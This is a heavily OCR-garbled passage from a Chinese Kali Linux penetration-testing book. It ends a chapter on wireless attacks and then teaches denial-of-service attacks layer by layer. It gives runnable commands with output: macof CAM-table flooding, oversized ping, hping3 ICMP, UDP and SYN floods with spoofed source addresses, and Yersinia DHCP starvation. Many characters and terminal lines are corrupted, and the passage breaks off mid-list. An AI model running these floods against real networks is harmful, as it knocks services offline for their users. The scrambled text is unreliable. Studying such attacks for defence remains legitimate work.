
在 这 一 章 中 我 们 总 结 了 无 线 网 络 的 各 种 滩 殉 方式 。 首 先 介 绍 了 了 无线 
网 络 的 核心 一 一 路 由 占有 的 入 侵 方 式 ， 接着 讲解 了 如 何 扫描 出 可 以 连接 的 
热点 。 在 有 些 时 候 ， 我 们 可 能 会 过 见 一 些 隐藏 了 SSID 的 热点 ， 在 本 章 的 
中 间 部 分 讲解 了 如 何 找 出 这 些 隐 号 热点 的 方法 。 去 接 看 讲解 了 如 何 使 用 
Ghost Phisher 来 构造 一 个 钓鱼 热点 ， 和 赁 售 这 个 热点 可 以 获取 目标 的 大 量 
信息 。 还 介绍 了 如 何 使 用 Fern Wi-Fi Cracker 来 破解 加 密 的 Wi-Fi 密 人 码 。 

最 后 给 出 了 一 个 Kismet 的 使 用 实例 ， 这 是 一 个 极为 有 效 的 无 线 网 络 审计 
d. 


事实 上 ， 无 线 网 络 硝 实 并 不 像 大 多 数 人 预计 的 那么 安全 。 这 一 章 中 
以 实例 的 形式 介绍 了 几 种 典型 的 无 线 渗透 工具 的 使 用 ， 这 些 工 具 可 以 有 
效 地 帮助 我 们 完成 渗透 任务 。 现 在 笃 握 对 无 线 网 络 的 渗透 技能 是 一 个 渗 
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拒绝 服务 攻击 


我 们 在 学 校 食 兰 用 和 餐 的 时 候 ， 经 各 会 有 等 待 餐 果 的 经 历 。 学 校 食 竺 
提供 的 餐 果 只 有 几 日 个 ， 往 往 有 人 归 排 者 队 等 待 餐 果 。 如 末 使 用 了 和 餐 昧 
的 人 返 迟 不 离开 的 话 ， 那 么 后 面 的 人 融会 越 来 越 多 ， 学 校 食 特 捉 供 的 餐 
桌 也 就 无 法 对 外 提供 正常 的 服务 了 。 当 然 平时 出 现 这 种 情况 的 主要 原因 
是 因为 学 校 食 音 提供 的 餐 果 数量 不 够 ， 只 要 增加 和 餐 果 的 数量 吏 可 以 解雇 
这 个 问题 了 。 但 是 如 条 是 有 人 故意 为 乙 的 话 ， 比 如 有 大 量 并 不 是 真 的 在 
hz 饭 的 人 却 鼎 看 餐 果 个 离开 的 话 ， 束 会 导致 其 他 人 部 无 法 在 这 个 食 告 进 
餐 。 那 么 这 时 食堂 实 际 上 已 经 不 能 正常 对 外 提供 服务 了， 这 种 故意 占用 
东 一 系统 对 外 服务 的 有 限 资 源 ， 从 而 导致 其 无 法 正 营 工作 的 行为 融 是 拒 
绝 服 务 攻击 。 


拒绝 服务 攻击 是 指 攻击 者 想 办 法 让 目标 机 器 停止 提供 服务 ， 是 黑客 
前 用 的 攻击 手段 之 一 。 其 实 对 网 络 市 完 进 行 的 消耗 性 攻击 只 是 拒绝 服务 
攻击 的 一 小 部 分 ， 只 要 能 够 对 目标 造成 肪 烦 ， 使 东 些 服务 航 暂 俘 甚 至 主 
机 死机 ， 虱 属于 拒绝 服务 攻击 。 拒 绝 服 务 攻 击 问 题 也 一 直 得 不 到 合理 的 
解决 ， 完 其 原因 是 因为 网 络 协议 本 里 的 安全 缺陷 ， 从 而 拒绝 服务 攻击 也 
成 为 了 攻击 者 的 终极 手法 。 


实际 上 拒绝 服务 攻击 并 不 是 一 个 攻击 方式 ， 而 是 一 类 其 有 相似 特征 
的 攻击 方式 的 集合 。 这 类 攻击 方式 分 布 极 三 ， 尖 客 可 能 会 利用 TCP/IP 协 
议 层 中 数据 链 路 层 、 网 络 层 、 传 输 层 和 应 用 层 各 种 协议 漏 铀 及 起 拒绝 服 
和 
现 的 方法 : 


e 数据 链 路 层 的 拒绝 服务 攻击 
e 网 络 层 的 拒绝 服务 攻击 
。 传输 层 的 拒绝 服务 攻击 


e 基于 应 用 层 的 拒绝 服务 攻击 


15.1. 数据 链 路 层 的 拒绝 服务 攻击 


首先 我 们 来 得 看 在 数据 链 路 层 发 起 的 拒绝 服务 攻击 方式 ， 很 多 人 对 
这 种 攻击 方式 很 陌生 ， 它 的 攻击 目标 是 二 层 交 换 机 。 这 种 攻击 方式 的 目 
AM 
m Is 
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UE? 现在 的 网 络 设 备 大 都 订 用 了 交换 机 ， 但 是 却 并 非 从 有 了 网络 的 时 候 我 
们 束 使 用 这 个 设备 。 早 期 网 络 使 用 的 是 一 种 名 为 集 线 右 的 设备 ， 如 来 你 
阅读 过 一 些 比较 老 旧 的 黑客 书籍 的 话 ， 那 里 面 大 都 会 捉 到 一 种 使 用 
sniffer 来 监听 整个 局 域 网 的 方法 。 这 种 方法 极为 徐 单 ， 只 需要 网 卡 文 持 
泥 森 模式 即 可 。 但 实际 上 如 琳 你 现在 真 的 按照 这 种 方法 的 话 ， 束 会 友 现 
其 实 除了 本 机 的 通信 之 外 将 会 一 无 所 获 。 这 是 怎么 回 事 呢 ? 


产生 这 种 情况 的 原因 在 于 多 年 前 局 域 网 进行 通信 的 设备 大 都 是 集 线 
禹 ， 而 现在 使 用 的 却 是 交换 机 。 这 两 种 设备 的 作用 相同 ， 都 可 以 实现 局 
域 网 两 个 主机 之 则 的 通信 。 但 是 工作 原理 却 不 同 ， 简 单 地 说 ， 集 线 夫 中 
没有 任何 的 “学 习 ” 和 “记忆 ”能 力 。 假 设 一 个 局 域 网 中 有 100 台 计算 机 ， 
这 些 计算 机 都 用 网 线 连接 到 集 线 硕 的 网 络 接口 上 ， 其 中 每 一 个 接口 对 应 
一 合计 算 机 。 当 其 中 的 A 计 算 机 在 同 B 计 算 机 及 送 数据 包 时 ， 需 要 驳 将 
数据 包 妈 给 集 线 融 ， 由 集 线 大 负责 转 及 。 可 是 当 集 线 套 收 到 这 个 数据 包 
时 并 不 知道 哪个 接口 连接 到 了 B 计 算 机 ， 所 以 集 线 硕 会 大 量 地 复制 这 个 
数据 包 ， 然 后 同 所 有 的 接口 虱 及 送 一 份 这 个 数据 包 的 副本 。 结 朱 融 是 局 
域 网 中 的 所 有 计算 机 都 收 到 了 这 份 数 据 包 ， 每 侣 计算 机 上 面 的 网 卡 会 碍 
看 这 合 数据 包 上 的 目的 信息 ， 如 采访 目的 并 非 本 机 的 话 ， 残 会 去 痉 这 个 
数据 包 。 这 样 就 只 有 B 计 算 机 才 会 接收 并 处 理 这 个 数据 包 。 但 是 这 种 机 
制 并 不 能 确 你 数据 包 的 你 密 性 ， 束 像 我 们 之 前 所 到 的 那样 ， 局 域 网 中 的 


任何 一 台 主 机 上 只 需要 将 网 卡 设 置 为 混杂 和 模式， 然后 使 用 抓 包 软 件 〈 例 如 
之 前 拓 到 的 Sniffer) ， 束 可 以 捕获 a 到 网 络 中 的 所 有 通信 数据 包 。 


目前 的 局 域 网 中 几乎 已 经 见 不 到 集线器 的 踪影 了 ， 取 而 代 之 的 是 交 
换 机 。 相 对 于 人 集线器， 交换 机 则 多 了 “记忆 ”和 “学 习 ” 的 功能 。 这 两 个 功 
能 是 通过 交换 机 中 的 CAM 表 实现 的 ， 这 张 表 中 保存 了 交换 机 中 每 个 接 
口 所 连接 计算 机 的 MAC 地 址 信息 ， 这 些 信 息 可 以 通过 动态 学 习 来 获 
得 。 


这 样 当局 域 网 中 的 A 计算 机 疝 B 计 算 机 发 送 数据 包 时 ， 会 先 将 这 个 
数据 包 发 送 到 交换 机 ， 由 交换 机 转发 。 交 换 机 在 收 到 这 个 数据 包 时 会 提 
取出 数据 包 的 目的 MAC 地 址 ， 并 查询 CAM 表 ， 如 果 能 查找 到 对 应 的 表 
项 ， 就 将 数据 包 从 找到 的 接口 发 送出 去 。 如 果 没 有 找到 ， 再 将 数据 包 问 
所 有 接口 友 送 。 在 转发 数据 包 的 时 候 ， 交 换 机 还 会 进行 一 个 学 习 的 过 
程 ， 交 换 机 会 将 接收 到 数据 包 中 的 源 MAC 地 址 提取 出 来 ， 并 查询 CAM 
表 ， 如 果 表 中 没有 这 个 源 MAC 地 址 对 应 接口 的 信息 ， 则 会 将 这 个 数据 
包 中 的 源 MAC 地 址 与 收 到 这 个 数据 包 的 接口 作为 新 的 表 项 插入 到 CAM 
表 中 。 交 换 机 的 学 习 是 一 个 动态 的 过 程 ， 每 个 表 项 并 不 是 固定 的 ， 而 是 
都 有 一 个 定时 器 (通常 是 5 分 钟 ) ， 从 这 个 表 项 插入 到 CAM 表 开始 起 ， 
当 该 定时 器 递减 到 零 时 ， 该 CAM 项 就 会 被 删除 。 


这 个 机 制 你 证 了 采用 交换机 设备 的 局 域 网 的 数据 包 传达 都 是 单 播 
的 ， 但 是 CAM 表 的 容量 是 有 限 的 ， 如 琳 短 时 间 内 收 a 到 了 大 量 的 不 同 源 
MAC 地 址 肥 来 的 数据 包 ，CAM 和 融会 被 项 满 。 当 需 请 之 后 ， 新 到 的 条 
目 殉 会 四 兰 前 面 的 条 目 。 这 样 当 网 络 中 正 篆 的 数据 包 到 达 区 换 机 之 后 ， 
而 交换 机 中 CAM 表 已 经 被 伪造 的 表 项 十 满 ， 无 法 找到 正确 的 对 应 关系 
时 ， 只 能 将 数据 包 广 播 出 去 。 这 时 收 到 攻击 的 交换 机 实际 上 已 经 退化 成 
本 集 线 右 了 了。 这 时 黑客 只 圾 要 在 目 己 的 计算 机 上 将 网 卡 设置 为 混 灯 模 
却 ， 驶 可 以 监听 整个 网 络 的 通信 了 。 


这 种 攻击 其 实 也 很 简单 ， 只 需要 伪造 大 量 的 数量 包 及 达到 交换 机 ， 
这 些 数 据 包 中 的 源 MAC 地 址 和 目的 MAC 地 址 都 是 随机 构造 出 来 的 ， 很 
快 束 可 以 将 交换 机 的 CAM 表 十 满 。 


Kali Linux 2 中 提供 了 很 多 可 以 完成 这 个 任务 的 工具 ， 我 们 来 介绍 一 
个 专门 用 来 完成 这 种 攻击 的 工具 -macof， 这 个 工具 的 使 用 方法 很 简单 ， 
下 面 给 出 了 这 个 工具 的 使 用 格式 : 


Usage: macof [-s src] [-d dst] [-e tha] [-x sport] [-y dport] [-i interfac 


e] [-n times] 


在 实际 应 用 中 ， 这 里 面 的 参数 只 有 -i 征 会 使 用 到 的 ， 这 个 参数 用 来 
指定 皮 达 这 些 伪 霹 数 据 包 的 网 卡 。 





使 用 macof 的 方法 很 简单 ， 在 Kali Linux 2 中 打开 一 个 终端 ， 然 后 输 
入 macof 即 可 启动 这 个 工具 。 


root@kali:~# macof 





图 15-1 中 给 出 了 这 个 工具 的 工作 界面 。 


:~# macof 
b:8c:a2:73:91:70 10:95:c5:13:65:f2 0.0.0.0.29051 > 0.0.0.0.42954: S 1055915902:1055915902(0) win 512 
:14:6c:12:0:3b 19:d6:3:23:8b:40 0.0.0.0.24562 > 0.0.0.0.11287: S 1672405459:1672405459(0) win 512 
:64:90:78:bf:65 b4:2a:1b:2c:e7:ed 0.0.0.0.3492 > 0.0.0.0.4130: S 788025476:788025476(0) win 512 
:C:78:41:2a:ff 7:62:bc:38:de:f6 0.0.0.0.50007 > 0.0.0.0.25356: S 1718844807:1718844807(0) win 512 
:2d :da:59:9d:a 58:41:6d:7b:43:80 0.0.0.0.41153 > 
:7:1b:4d:1a:57 6d:8e:95:3d:e2:ab 0.0.0.0.60049 > 53926: S 1987150339:1987150339(0) win 512 
:8c:bc:70:7c:c6 ee:9e:4a:4a:9d:17 0.0.0.0.21452 .0.0.180: S 433202180:433202180(0) win 512 
:27:c0:5a:fc:c4 f4:23:6f:1e:3f:bf 0.0.0.0.36038 .0.0.26113: S 1542741169:1542741169(0) win 512 
:70:56:5b:b8:8d a9:ad:d5:2f:48:18 0.0.0.0.155 > .0.9261: S 387309074:387309074(0) win 512 
:Cb:ac:42:1:72 96:d5:f5:69:74:77 0.0.0.0.53821 > 0.0.0.0.56682: 5 1268298243:1268298243(0) win 512 
:ff:f6:15:15:0 c2:18:4e:3c:95:57 0.0.0.0.58656 » 0. .0.52251: S 553082714:553082714(0) win 512 
:lds6¥:35:97:4c ba:80:c4:2a:ff:2f 0.0.0.0.21121 .0.58746: S 1745297728:1745297728(0) win 512 
:db:e0:2:83:17 b9:77:f1:41:16:1e 0.0.0.0.6910 > .24885: S 1671707920:1671707920(0) win 512 
:C2:18:2f:e6:b5 ca:42:e5:55:5a:46 0.0.0.0.24746 0.29340: S 935455837 :935455837(0) win 512 
:3a:77:55:9f:76 b:78:88:35:el:bb 0.0.0.0.8444 > ET S 462871639:462871639(0) win 512 
:1 1 ss2f:77:d6 <6:el6:66274:faubsgagbsgbsd857SE> 0.0.0.0.36748: S 2116367310:2116367310(0) win 512 
:89:ce:1e:3d:23 68:d2:ef:41:d6:40 0.0.0.0.39129 > 0.0.0.0.19010: S 1135825085:1135825085(0) win 512 
du i AT I Ef .RT E EI Tn EST 0.0.60230 » 0.0.0.0.33201: S 868294550:868294550(0) win 512 
fc:f:f9:1b:21:94. 31:15:7c:24: hc: 5d 0.0.15994 » 0.0.0.0.19539: S 520920764:520920764(0) win 512 
a:a90:bb:1:ef:65 a2:54:9:3f:1d:bf 0 0.57585 » 0.0.0.0.49054: S 144064240:144064240(0) win 512 
8:84:8f:78:c5:72 bc:89:7a:10:31:30 0.0.2664 » 0.0.0.0.14048: S 277670928:277670928(0) win 512 
0.0 
0.0 


0.0.0.0.11034: S 1731891811:1731891811(0) win 512 
0.0.0.0. 


EIER ED EPAERPEREAEC PSY ER EHI FEARS: .911 » 0.0.0.0.21706: S 1209271478:1209271478(0) win 512 
47:77:11:4d:8f:f7 b2:71:4:34:e3:d8 .22056 > 0.0.0.0.6048: S 1614916568:1614916568(08) win 512 
9b:d4:67:38:b2:88 7b:30:18:5f:39:a7 0.0.0.0.41509 > 0.0.0.0.17227: S 1865294782:1865294782(0) win 512 
1:ea:9:37:1:ad 80:17:d6:2f:ec:92 0.0.0.0.37731 » 0.0.0.0.33474: S 343678451:343678451(0) win 512 


图 15-1  macofIH] Id 2& c 35 I^] SC E, 


交换 机 在 遭 到 攻击 之 后 ， 内 部 的 CAM 表 很 快 就 被 填 满 了 。 交 换 机 
退化 成 集 线 磺 ， 会 将 收 到 的 数据 包 全 部 广播 出 去 ， 从 而 无 法 正 篆 地 回 局 
域 网 提供 转 友 功能 。 


0.0 
0.0 
T NUM 
ie 
0.0 
0.0 





15.2. 网络 层 的 拒绝 服务 攻击 


位 于 网 络 层 的 协议 包括 ARP、IP 和 ICMP 等 ， 其 中 的 ICMP 协 议 主要 
用 于 在 IP 主 机 、 路 由 器 之 间 来 传递 控制 消息 。 我 们 平时 检测 网 络 连通 情 
况 时 使 用 的 Ping 命 令 就 是 基于 ICMP 协 议 的 ， 例如 我 们 希望 TUB AS BUE 
送 的 数据 包 是 否 可 以 到 达 192.168.1.101 就 可 以 使 用 如 图 15-2 所 示 的 Ping 


root@kali: ~ oo o 
File Edit View Search Terminal Help 
:~# ping 192.168.1.101 
PING 192.168.1. 101 (192.168.1.101) 56(84) bytes of data 
2.168.1.181: 


icmp seq-2 ttl-128 time- 1337 IE 

: icmp seq-3 ttl-128 time-314 ms 

. : icmp Seq=4 ttl-128 time-538 ms 

64 bytes from 192. 168. E 101: icmp seq-5 ttl=128 time-154 ms 
64 bytes from 192.168.1.101: icmp seq=6 ttl=128 time=72.5 ms 
64 bytes from 192.168.1.101: icmp seq-7 ttl-128 time-295 ms 
64 bytes from 192.168.1.101: icmp seq=8 ttl=128 time=219 ms 


图 15-2 ”使 用 ping 命 令 同 目标 发 这 数据 包 


从 图 15-2 中 可 以 看 出 ， 我 们 发 送 的 数据 包 得 到 了 应 答 数据 包 ， 这 说 
明 192.168.1.101 收 到 了 有 发 出 的 数据 包 ， 并 给 出 了 应 答 。 这 个 过 程 末 和 守 了 
ICMP 协 议 的 规定 。 上 面 例子 中 使 用 的 ping 束 是 IMCP 请 求 “Type=8) ， 
收 到 的 回应 就 是 ICMP 应 答 〈Type=0) ， 一 台 主 机 向 一 个 节点 发 送 一 个 
Type=8 的 ICMP 报 文 ， 如 有 果 途 中 没有 异 币 《例如 被 路 由 亏 丢 寞 、 目 标 不 
^r^ ied ， 则 目标 返回 Type=0 的 ICMP 报 文 ， 说 明 这 人 台 主 
JL AT TE o 


但 yn 是 需要 消耗 CPU 资源 的 ， 处 理 少 量 
的 ICMP 请 求 并 不 会 对 CPU 的 运行 速度 产生 影响 ， 但 是 大 量 的 ICMP 请 求 
He ? 





我 们 仍然 使 用 Ping 命 令 来 答 试 一 下 ， 这 次 将 ICMP 数 据 包 设置 得 足 


ERK, Pinn mS KZRA ARa MEH -KH E Go BL A 4E 
73655000 ， 这 样 构 造 好 的 数据 包 被 称 作 “死亡 之 Ping”， 因 为 早期 的 系 
统 无 法 处 理 这 么 大 的 ICMP 数 据 包 ， 在 接收 到 这 种 数据 包 之 后 束 会 死 
机 ， 现 在 的 系统 则 不 会 出 现 这 种 问题 ， 但 是 我 们 可 以 考虑 使 用 这 种 方式 
向 目标 连续 的 发 送 这 种 “死亡 之 Ping” 来 消耗 目标 主机 的 资源 ， 例 如 向 目 
标 不 断 的 发 送 大 小 为 65500 的 数据 包 ， 如 图 15-3 所 示 。 


root@kali: ~ oo Q 
File Edit View Search Terminal Help 


:~# ping 192.168.1.101 -L 65500 
WARNING: probably, rcvbuf is enough to hold preload. 





not 
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data. 


64 bytes from 192.168.1.101: icmp seq=471 ttl=128 time=258 ms 

64 bytes from 192.168.1.101: icmp seq-472 ttl-128 time=457 ms 

64 bytes from 192.168.1.101: icmp seq-473 ttl-128 time-74.8 ms 
64 bytes from 192.168.1.101: icmp seq-474 ttl-128 time-1314 ms 
64 bytes from 192.168.1.101: icmp seq-475 ttl-128 time-351 ms 

64 bytes from 192.168.1.101: icmp seq-477 ttl-128 time-199 ms 

64 bytes from 192.168.1.101: icmp seq-481 ttl-128 time-450 ms 

64 bytes from 192.168.1.101: icmp seq-482 ttl-128 time-574 ms 

64 bytes from 192.168.1.101: icmp seq-484 ttl-128 time-318 ms 

64 bytes from 192.168.1.101: icmp seq-485 ttl-128 time-642 ms 

64 bytes from 192.168.1.101: icmp seq-486 ttl-128 time-29.9 ms 
64 bytes from 192.168.1.101: icmp seq-487 ttl-128 time-179 ms 

64 bytes from 192.168.1.101: icmp seq-488 ttl-128 time-123 ms 

gn t 


--- 192.168.1.101 ping statistics --- 

488 packets transmitted, 13 received, 97% packet loss, time 19006ms 

rtt min/avg/max/mdev = 29.980/382.758/1314.902/324.077 ms, pipe 2 
TM 
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这 里 我 们 只 向 目标 发 送 了 488 个 ICMP 数 据 包 就 停 上 上 了， 实际 上 我 们 
发 送 再 多 的 数据 包 效 果 也 并 不 明显 ， 这 个 原因 主要 是 现在 的 操作 系统 和 
CPU 完全 有 能 力 处 理 这 个 数量 级 的 数据 包 ， 那 么 接 下 来 呢 ， 既 然 对 方 能 
够 承受 这 个 速度 的 数据 包 了 ， 那 么 我 们 的 拒绝 服务 攻击 也 束 没 有 效果 
了 。 我 们 必须 想 办 法 提高 发 送 到 目标 的 数据 包 的 数量 ， 这 里 主要 有 两 个 
办 法 ， 一 是 同时 使 用 多 人 台 计 算 机 发 送 ICMP 数 据 包 ， 二 是 提高 发 送 的 
ICMP 数 据 包 的 速度 。 


第 一 种 方法 只 需要 更 多 的 设备 重复 上 面 的 操作 即 可 ， 我 们 现在 来 学 
习 以 下 第 二 种 方法 的 实现 ， 那 融 是 使 用 专门 进行 拒绝 服务 攻击 的 工具 ， 
相 比 起 系统 目 市 的 Ping 程 序 ， 这 种 工具 的 效率 更 高 ， 速 度 更 快 。 


这 次 我 们 采用 Kali linux 2 中 目 市 的 hping3 来 进行 一 次 拒绝 服务 攻 
击 。 这 是 一 款 用 于 生成 和 解析 TCP/AP 协 议 数 据 包 的 开源 工具 ， 之 前 推出 
过 hping 和 hping2 两 个 版 本 ， 目 前 最 新 的 版 本 是 hping3。 利 用 这 和 天 工具 我 
们 可 以 快速 定制 数据 包 的 各 个 部 分 ，hping3 也 是 一 个 命令 式 的 工具 ， 其 
中 的 各 种 功能 要 依 徘 设置 参数 来 实现 。 局 动 hping3 的 方式 束 是 在 Kali 
linux 2 中 局 动 一 个 终 问 ， 然 后 输入 “hping3” 即 可 : 


root@kali:~# hping3 
hping3» 


鉴于 hping3 的 参数 数目 众多 ， 我 们 可 以 参考 这 个 工具 的 帮助 文件 ， 
参看 帮助 的 方法 是 在 终 闹 中 局 动 输入 “hping3 --help”， 因 为 这 个 帮助 较 
长 ， 所 以 我 们 这 里 只 讲述 其 中 一 小 部 分 ， 其 余部 分 你 可 以 目 行 得 看 帮助 
X. 


hping3 中 的 各 个 参数 合 义 具体 如 下 : 


--help 显示 帮助 信息 

--version 显示 当前 hping 的 版 本 

- -count 发 送 指定 数据 包 的 次 数 

--interval 发 送 数 据 包 之 则 的 间隔 时 间 (格式 为 XxX， 表示 间隔 时 间 为 X 微 秒 》 
--fast 将 数据 包 之 间 的 间隔 时 间 设 置 为 16666 微 秒 ， 也 就 是 每 秒 发 送 16 个 
--faster 将 数据 包 之 间 的 间隔 时 间 设 置 为 1666 微 秒 ， 也 就 是 每 秒 发 送 166 个 
- -flood 尺 可 能 快 地 发 送 数 据 包 ， 不 显示 回应 

--numeric 数值 化 的 输出 

--quiet 静默 模式 ， 只 显示 最 后 的 统计 数据 

--interface 指定 需要 使 用 的 网 络 接口 

- -verbose 详细 模式 

--debug 调试 信息 

--bind 将 “ctrl+z” 键 组 合 键 与 发 送 包 的 TTL 值 绑 定 ， 按 一 次 TTL 值 加 1 

--unbind 解除 “ctrl+z” 键 组 合 键 与 发 送 包 的 TTL 值 的 绑 定 
--beep 每 个 接收 到 的 数据 包 都 有 蜂 鸣 提示 


hping3 中 发 送 数据 包 的 模式 选择 如 下 : 














--icmp ICMP 模 式 ， 此 模式 下 HPING 会 发 送 IGMP 应 答 报 ， 你 可 以 用 -ICMPTYP 


- -ICMPCODE 选 项 发 送 其 他 类 型 /模式 的 ICMP 报 文 。 


-:2 - -udp UDP 模式 ， 缺 省 下 ，HPING 会 发 送 UDP 报 文 到 主机 的 8 端口 ， 你 可 以 用 
--baseport --destport --keep 选 项 指定 其 模式 。 
-8 --scan SCAN mode. // 扫 描 模式 指定 扫描 对 应 的 端口 。 








好 了 ， 现 在 我 们 就 利用 刚刚 介绍 过 的 hping3 参 数 来 构造 一 次 基于 
ICMP 协 议 的 拒绝 服务 攻击 ， 在 Kali Linux 2 中 打开 一 个 终端 ， 然 后 在 终 
im PRA: 


root@kali:~# hping3 -q --rand-source --id 0 --icmp -d 56 --flood 192.168.1 


.101 





这 里 面 的 -q 表示 静默 模式 ， 不 显示 接收 和 发 送 的 数据 包 ; --rand- 
source 表示 伪造 随机 的 源 地 址 ，--id 0 表示 有 ICMP echo 请 求 ERN] 
平时 执行 Ping 命 令 时 的 数据 包 )，-d 56 表 示 包 的 大 小 (56 是 Ping 命 令 时 数 
WAEA), --flood 表示 尺 可 能 快 地 发 这 数据 包 ， 如 图 15-4 所 示 。 


:~# hping3 -q --rand-source --id O --icmp -d 56 --flood 192.168.1.101 
HPING 192.168.1.101 (ethO 192.168.1.101): icmp mode set, 28 headers + 56 data by 


eu 
hping in flood mode, no replies will be shown 


图 15-4 使 用 hping3 同 目标 进行 ICMP 拒 绝 服务 攻击 


这 种 攻击 产生 数据 包 的 速度 非常 之 快 ， 我 们 使 用 "Ctrl+C” 组 合 键 能 
结束 这 个 过 程 ， 可 以 看 到 在 短 短 的 几 秒 钟 时 间 内 ， 惑 已 经 产生 了 几 十 万 
个 ICMP 数 据 包 ， 如 图 15-5 所 示 。 





--- 192.168.1.101 hping statistic - 





316110 packets transmitted, 0 halalts received, 100% packet loss 
round-trip min/avg/max - 0.0/0.0/0.0 ms 


图 15-5 hping3 发 包 统 计 


15.3 ”传输 层 的 拒绝 服务 攻击 


TCP 和 UDP 协议 都 位 于 这 一 层 ， 而 这 两 个 协议 都 可 以 实现 拒绝 服务 
攻击 ， 但 是 攻击 方式 并 不 相同 。UDP 拒 绝 服务 攻击 与 ICMP 拒 绝 服务 攻 
击 原理 相同 ， 也 需要 同 目 标 快速 的 发 送 大 量 数 据 ， 不 同 之 处 在 于 UDP 的 
目标 是 目的 主机 的 一 个 端口 ， 而 ICMP 则 与 端口 无 关 。 下 面 我 们 利用 
hping3 的 这 些 参数 来 对 目标 进行 一 次 拒绝 服务 攻击 。 在 开始 攻击 之 前 ， 
必须 要 明确 知道 目标 端口 ， 而 且 该 病 口 必须 是 使 用 UDP 协 议 ， 而 且 是 开 
放 的 。 现 在 主机 大 都 使 用 DHCP 来 设置 网 络 信 息 ， 这 个 协议 在 传输 层 惑 
使 用 UDP 协 议 ， 其 中 67 和 68 新 口 都 是 正常 的 DHCP 服 务 端 口 ，67 作 为 
DHCPserver 的 服务 端口 ，68 作 为 DHCP client 的 服务 端口 ， 所 以 这 里 我 
们 将 目标 端口 设置 为 68。 


好 了 ， 现 在 我 们 束 利 用 刚刚 介绍 过 的 hping3 来 构造 一 次 基于 UDP 协 
议 的 拒绝 服务 攻击 ， 在 Kali Linux 2 中 打开 一 个 终 痢 ， 然 后 在 终 珊 中 输入 
如 下 命令 即 可 开始 此 次 攻击 。 


hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.0.2 





但 是 这 种 基于 UDP 协 议 的 拒绝 服务 攻击 在 实际 中 使 用 得 并 不 多 。 


而 基于 TCP 协 议 的 拒绝 服务 攻击 则 要 复杂 一 些 ， 但 是 我 们 平时 
所 说 的 拒绝 服务 攻击 指 的 都 是 基于 这 个 协议 的 攻击 。 因 为 现实 中 拒绝 攻 
击 服 务 的 对 象 往往 都 是 那些 提供 HTTP 服 务 的 服务 器 ， 为 HTTP 协 议 提供 
支持 的 TCP 协 议和 目 然 也 就 成 了 拒绝 服务 攻击 的 重 灾区 。 


不 同 于 针对 ICMP 和 UDP 协议 的 拒绝 服务 攻击 方式 ， 基 于 TCP 的 攻 
击 方式 是 面 同 连接 的 。 只 需要 和 目标 主机 的 问 口 建立 大 量 的 TCP 连 接 ， 
就 可 以 让 目标 主机 的 连接 表 被 填 潢 ， 从 而 不 会 再 接收 任何 新 的 连接 。 
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手 ， 建 立 一 个 完整 连接 。 帮 一 种 是 只 和 目标 端口 完成 3 次 握手 中 的 前 两 
次 ， 建 并 的 十 一 个 不 完整 的 连接 ， 这 种 攻击 方式 古 最 为 妾 见 的 ， 我 们 通 
第 将 这 种 攻击 方式 成 为 SYN 拒 绝 服务 攻击 。 这 种 攻击 方式 中 ， 攻 击 方 会 
问 目标 妆 口 发 送 大 量 设置 了 SYN 标 志 位 的 TCP 数 据 包 ， 受 攻击 的 服务 大 
会 根据 这 些 数 据 包 建 并 连接 ， 并 将 连接 的 信息 存储 在 连接 表 中 ， 而 攻击 
方 不 断 地 及 送 SYN 数 据 包 ， 很 快 融会 将 连接 表 需 满 ， 此 时 受 攻 击 的 服务 
希 融 无 法 接收 新 来 的 连接 请 求 了 。 


好 了 ， 现 在 我 们 就 利用 刚刚 介绍 过 的 hping3 参 数 来 构造 一 次 基于 
TCP 协 议 的 拒绝 服务 攻击 ， 在 Kali Linux 2H 11T2T— T 2&9m, AEA m 
中 输入 : 


hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.0.2 





这 样 束 完成 了 一 次 对 目标 的 TCP 拒 绝 服 务 攻 击 。 


15.4 其 于 应 用 层 的 拒绝 服务 攻击 


位 于 应 用 层 的 协议 比较 多 ， 第 见 的 有 HTTP、FTP、DNS、DHCP 
等 。 每 个 协议 都 有 可 能 被 利用 来 有 起 拒绝 服务 攻击 ， 这 里 我 们 以 其 中 的 
DHCPPUMHXZjftft. DHCP (Dynamic Host Configuration Protocol， 动 
态 主机 配置 协议 ) 通常 被 应 用 在 大 型 的 局 域 网 络 环境 中 ， 主 要 作用 是 集 
中 地 管理 、 分 配 卫 地 址 ， 使 网 络 环境 中 的 主机 动态 地 获得 耻 地 址 、 
Gateway 地 址 、DNS 服 务 占 地 址 等 信息 ， 并 能 够 提升 地 址 的 使 用 这 。 


DHCP 上 协议 采用 客户 闹 / 服 务 占 模型 ， 主 机 地 址 的 动态 分 配 任务 由 网 
络 主机 驱动 。 当 DHCP 服 务 絮 接收 到 来 日 网 络 主机 申请 地 址 的 信息 时 ， 
才 会 回 网 络 主机 发 送 相 关 的 地 址 配置 等 信息 ， 以 实现 网 络 主机 地 址 信息 
的 动态 配置 。 

DHCP 攻 击 的 目标 也 是 服务 器 ， 怀 有 恶意 的 用 户 念 造 大 量 DHCP 请 
求 报 文 发 送 到 服务 右 ， 这 样 DHCP 服 务 占 地 址 池 中 的 IP 地 址 会 很 快 束 分 
配 完 毕 ， 从 而 导致 合法 用 户 无 法 申请 到 IP 地 址 。 辣 时 大 量 的 DHCP 请 求 
tox Ek uu. Mat ees e E. 

在 这 一 节 中 我 们 使 用 到 两 个 工具 ， 一 个 是 Yersinia， 这 是 一 个 十 分 
织 大 的 拒绝 服务 攻击 工具 ;为 一 个 是 我 们 比较 熟悉 的 Metasploit。 

在 这 里 我 们 首先 使 用 Yersinia 进 行 DHCP 攻 击 实验 ， 这 是 一 款 图 形 化 
的 工具 ， 我 们 在 命令 行 中 输入 “yersinia -G” 就 可 以 以 图 形 化 界面 的 形式 
JA SX SX LA. 


root@kali:~# yersinia -G 


图 15-6 就 是 启动 以 后 的 Yersinia 工 作 界 面 ， 现 在 的 版 本 为 0.73。 


Yersinia 0.7.3 


File Protocols Actio i ce: 


« Ds s 日 
v v 
Laun EM... Er Load cealilt Datamon Glen sa! ape ^ Edi mod Ek 


Protocols Packets CDP DHCP 802.10 802.1X DTP HSRP ISL MPLS STP VIP Yersinia log 


TTL DevID Interface Count Last s 








03:28:32 





图 15-6 Yersinia LE 7t [Hil 


单 击 “Lauch attack” 选 择 攻 击 方 式 ，Yersinia 提 供 了 对 很 多 种 网 络 常 
见 协议 的 攻击 方式 ， 例 如 CDP、DHCP、DTP、HSRP、ISL、MPLS、 
